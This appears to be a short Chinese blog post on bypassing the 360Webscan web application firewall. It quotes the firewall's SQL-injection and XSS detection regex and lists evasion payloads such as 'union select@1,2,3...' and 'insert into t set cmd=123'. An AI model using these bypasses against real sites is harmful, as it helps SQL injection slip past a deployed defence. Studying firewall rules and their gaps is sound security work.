360Webscan Bypass
2024-09-08 10:03:11
来到select正则:
1
|
\<.+javascript:window\[.{1}\\x|<.*=(&#\d+?;?)+?>|<.*(data|src)=data:text\/html.*>|\b(alert\(|confirm\(|expression\(|prompt\(|benchmark\s*?\(.*\)|sleep\s*?\(.*\)|load_file\s*?\()|<[a-z]+?\b[^>]*?\bon([a-z]{4,})\s*?=|^\+\/v(8|9)|\b( and | or )\b\s*?([\(\) '"\d]+?=[\(\)' "\d]+?|[\(\) '"a-zA-Z]+?=[\(\)' "a-zA-Z]+?|>|<|\s+?[\w]+?\s+?\bin\b\s*?\(|\blike\b\s+?[ "'])|\/\*.*\*\/|<\s*script\b|\bEXEC\b|UNION.+?SELECT@{0,2}(\(.+\)|\s+?.+?|(`|'|" ).*?(`| '|"))|UPDATE@{0,2}(\(.+\)|\s+?.+?|(`|' |").*?(`| '|"))SET|INSERT\s+INTO.+?VALUES|(SELECT|DELETE)@{0,2}(\(.+\)|\s+?.+?\s+?|(`|' |").*?(`| '|"))FROM(\(.+\)|\s+?.+?|(`|' |").*?(`| '|"))|(CREATE|ALTER|DROP|TRUNCATE)\s+(TABLE|DATABASE)|\/\*.*?\*\/|' |
Bypass:
union select@1,2,3,4,5,6,7
union select@1=@1,2,3,4,5,6,7
insert正则部分:
1
|
INSERT\s+INTO.+?(VALUES|SET) |
Bypass:
insert into t set cmd=123
最新文章
- Qt中的qreal
- hdu1231最大连续子序列
- Python try/except/finally应用
- JDK中工具类的使用
- 执行*.sh脚本时提示Permission denied
- c#抽象工厂模式
- C++设计模式---Strategy模式
- 将Eclipse代码导入到Android Studio的两种方式
- 为什么要用on()而不直接使用click
- CentOS 7 命令备忘录
- 使用C#开发ActiveX控件
- TableView的性能优化
- java 中文乱码问题,请注意response.getWriter的顺序
- create-react-app不暴露配置设置proxy代理
- cobbler自动装机服务简介与配置
- mysql建表基本语法
- Java08-java语法基础(七)构造方法
- laravel中不使用 remember_token时退出报错,如何解决?
- MongoDB 比较适用哪些业务场景?
- N76E003之SPI